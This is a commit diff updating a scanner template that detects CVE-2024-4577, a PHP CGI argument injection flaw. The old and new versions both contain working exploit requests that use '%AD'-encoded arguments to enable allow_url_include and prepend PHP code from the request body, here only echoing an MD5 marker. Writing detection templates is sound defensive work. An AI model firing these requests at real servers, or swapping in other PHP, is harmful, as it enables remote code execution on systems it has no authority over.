Update CVE-2024-4577.yaml

2024-06-09 23:26:25 +04:00 · 2024-06-09 23:26:25 +04:00 · 2b061b5113
parent 5635a451a7
commit 2b061b5113
1 changed files with 21 additions and 31 deletions
--- a/http/cves/2024/CVE-2024-4577.yaml
+++ b/http/cves/2024/CVE-2024-4577.yaml
@ -1,41 +1,31 @@
 id: CVE-2024-4577

 info:
-  name: PHP CGI Argument Injection Vulnerability
-  author: securityforeveryone
-  severity: high
+  name: PHP CGI - Argument Injection
+  author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch
+  severity: critical
  description: |
-    CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.
-  reference:
-    - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123
-    - https://github.com/TAM-K592/CVE-2024-4577/tree/main
-  tags: rce,php,cgi,cve2024,cve
+    Detects PHP CGI Argument Injection vulnerability
+  impact: |
+    Successful exploitation could lead to remote code execution on the affected system.
+  remediation: |
+    Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
+  tags: cve,cve2024,php,cgi,rce

-http:
-  - raw:
-      - |
-        POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
+      - "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"

-        <?php echo "vulnerable"; ?>
+    body: |
+      <?php echo md5("CVE-2024-4577"); ?>

-      - |
-        POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        <?php echo "vulnerable"; ?>
-
-    matchers-condition: and
+    stop-at-first-match: true
    matchers:
      - type: word
+        part: body
        words:
-          - "index of"
-          - "directory"
-          - "vulnerable"
-        condition: or
-
-      - type: status
-        status:
-          - 200
+          - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"